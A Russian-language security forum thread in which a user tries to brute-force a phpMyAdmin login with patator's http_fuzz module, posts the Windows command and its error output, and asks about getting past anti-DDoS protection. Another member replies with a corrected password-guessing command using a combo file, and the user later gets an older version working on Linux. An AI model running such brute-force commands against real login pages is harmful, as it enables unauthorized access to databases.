• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Patator брут phpMYadmin

Y

yuriygagarin

впервые столкнулся с patator.py, решил проверить на phpMyadmin но вот что то пошло не так...
скомпилирована версия 0.7 под виндой,все нужные библиотеки установлены...
Код: 
текст исполнения---
c:\patator>patator.py http_fuzz url="http://xxxxxxxxxxx/pma/index.php" method
=POST body='pma_username=root&pma_password=FILE0&server=1' 0=txt.txt follow=1 accept
_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server'
01:47:26 patator    INFO - Starting Patator v0.7-beta (https://github.com/lanjel
ot/patator) at 2017-04-01 01:47 RTZ 6 (чшьр)
01:47:26 patator    INFO -

01:47:26 patator    INFO - code size:clen       time | candidate
          |   num | mesg
01:47:26 patator    INFO - -----------------------------------------------------
------------------------
01:47:26 patator    INFO - 503  4761:-1        0.109 |
          |     1 | HTTP/1.1 503 Service Temporarily Unavailable
01:47:27 patator    INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 1 r/s, Time
: 0h 0m 0s 
"pma_password" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"server" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
пока писал и думал,решил спросить...может кто знает как в patator сделать двойной запрос сайта(через 5сек) на админке стоит защита от дудосеров(не относиться к основной теме)
 
ghostphisher

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Код: 
body='pma_username=COMBO00&pma_password=COMBO01&server=1&lang=en'  <---- язык

 $ http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&lang=en' 0=combos.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf

пример строки.
 
Y

yuriygagarin

ghostphisher сказал(а):
Код: 
body='pma_username=COMBO00&pma_password=COMBO01&server=1&lang=en'  <---- язык

 $ http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&lang=en' 0=combos.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf

пример строки.
Нажмите, чтобы раскрыть...
отталкивался в построении запроса от этого шаблона...
после кода элемента- "pma_username=root&" идет ошибка
 
ghostphisher

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
По всей видимости стоит попробовать пересобраться вновь, проверив условия для полноценной сборки.
 
Y

yuriygagarin

вообщем под виндой не получается((( попробую в линуксе
[doublepost=1491068380,1490995925][/doublepost]в линуксе поставил версию 06 а не 07 и все заработало))) видимо где то ошибка либо в 0.7 версии,либо под виндой...может позже разберусь,и добавлю в тему(может кому пригодиться)
 
ghostphisher

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
yuriygagarin сказал(а):
вообщем под виндой не получается((( попробую в линуксе
[doublepost=1491068380,1490995925][/doublepost]в линуксе поставил версию 06 а не 07 и все заработало))) видимо где то ошибка либо в 0.7 версии,либо под виндой...может позже разберусь,и добавлю в тему(может кому пригодиться)
Нажмите, чтобы раскрыть...

Под виндой софт не так хорошо себя ведет, который изначально был предназначен к другой ОС. Ошибка при сборке, ошибка библиотек, корявость винды + много волшебных факторов = неработоспособность. Стоит внимание обратить - у других на винде и 06 и 07 работает без нареканий, а у кого то нет.
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ